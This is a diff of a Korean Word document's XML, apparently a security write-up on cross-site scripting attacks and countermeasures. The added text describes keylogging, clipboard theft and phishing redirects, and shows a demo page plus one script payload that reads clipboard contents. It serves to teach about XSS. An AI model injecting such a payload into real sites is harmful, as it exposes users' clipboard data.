+        <w:ind w:left="3800" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4200" w:hanging="400"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="7E654D84"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3244C236"/>
@@ -2974,10 +3737,16 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="2">
-    <w:abstractNumId w:val="1"/>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -4014,7 +4783,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{34653238-5CCD-44A1-8579-8CFB6CB5E6D2}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E2363985-D500-4E76-B646-0DA37B8ABD48}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/WebFilter/크로스 사이트 스크립팅 대응방안.docx
+++ b/WebFilter/크로스 사이트 스크립팅 대응방안.docx
@@ -48,9 +48,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -60,11 +57,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -115,25 +107,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>를 통한 인증정보 노출 방지</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>를</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 목</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
+        <w:t xml:space="preserve">를 통한 인증정보 노출 방지를 목표로 하여 XSS을 활용한 다양한 공격 방식을 대비하지 못하는 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -145,62 +119,30 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">는 경우가 있다. 이에 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>XSS를 활용한</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 다른 유형의 공격을 알아보고자 한다.</w:t>
+        <w:t>는 경우가 있다. 이에 XSS를 활용한 다른 유형의 공격을 알아보고자 한다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>공격</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>스크립트 구문 삽입을 이용해서 다른 사용자에게 피해를 입힐 수 있는 다양한 방법을 알아본다.</w:t>
+      </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>공격</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>스크립트 구문 삽입을 이용해서 다른 사용자에게 피해를 입힐 수 있는 다양한 방법을 알아본다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
@@ -209,9 +151,6 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -221,11 +160,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -247,13 +181,7 @@
         <w:t>(Keylogging)이라 한다. 다음은 짧은 스크립트 코드를 삽입하여 사용자의 입력 값을 가로채는 공격의 예시이다.</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
@@ -262,9 +190,6 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -274,11 +199,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -291,357 +211,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 공격과 유사</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>피싱</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 사이트로 이동</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">미리 구성한 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>피싱</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>HTML 태그를 이용한 스크립트 실행</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>결론</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">XSS 취약점은 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="1"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>크로스</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>스크립팅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 대응방안</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>개요</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>웹</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 페이지에 악의적인 스크립트를 포함시켜 불특정 다수의 사용자들에게서 동작 시키는 공격인 크로스 사이트 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>스크립팅은</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 비교적 쉬운 테스트 코드로 인하여 쉽게 대응할 수 있을 것이라 생각할 수 있지만 상당한 복잡성을 가지고 있다. 이에 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>네이버의</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> XSS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 필터를 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>참고</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">하여 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">상세한 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>대응방안을 자세히 알아보고자 한다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>보안대책</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>외부입력</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 값에 삽입된 스크립트 구문 작성 시 사용되는 특수문자를 HTML </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>인코딩</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 문자로 치환하여 스크립트 구문의 동작을 막는다. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>별도의 제약사항 없이 모든 태그 무력화</w:t>
+        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -649,7 +219,7 @@
         <w:pStyle w:val="4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="5"/>
         </w:numPr>
         <w:ind w:leftChars="0" w:firstLineChars="0"/>
       </w:pPr>
@@ -657,10 +227,13 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>코드</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 예제</w:t>
+        <w:t>클립보드 복사</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 페이지</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -670,8 +243,739 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1384"/>
-        <w:gridCol w:w="9298"/>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9563"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;!DOCTYPE html&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;head&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;meta http-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>equiv</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>="Content-Type" content="text/html; charset=</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>euc-kr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>" /&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;title&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>중요테이터를</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 복사하세요&lt;/title&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;script src="https://cdn.jsdelivr.net/clipboard.js/1.5.3/clipboard.min.js"&gt;&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;script </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>src</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>="https://code.jquery.com/jquery-3.1.1.min.js"&gt;&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;/head&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>window.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> = function(){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    $(document).ready(function(){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>var</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> clipboard = new Clipboard('.clipboard');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    });</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>일련번호</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> :</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> &lt;input type = "text" id = "copy" value="8282"&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:t>&lt;button class="clipboard" data-clipboard-target="#copy"&gt; 복사 &lt;/button&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0">
+                  <wp:extent cx="5280212" cy="2330823"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="3" name="그림 3"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name="1.png"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill rotWithShape="1">
+                          <a:blip r:embed="rId7">
+                            <a:extLst>
+                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                              </a:ext>
+                            </a:extLst>
+                          </a:blip>
+                          <a:srcRect r="20562"/>
+                          <a:stretch/>
+                        </pic:blipFill>
+                        <pic:spPr bwMode="auto">
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5279367" cy="2330450"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:ln>
+                            <a:noFill/>
+                          </a:ln>
+                          <a:extLst>
+                            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                            </a:ext>
+                          </a:extLst>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">위와 같이 데이터를 클립보드에 저장하는 기능을 제공하는 사이트가 있다면, 사이트 이용 시 사용자와 관련된 정보가 클립보드에 저장되어 있을 가능성이 높다. </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9563"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>alert(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>window.clipboardData.getData</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>('Text'));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
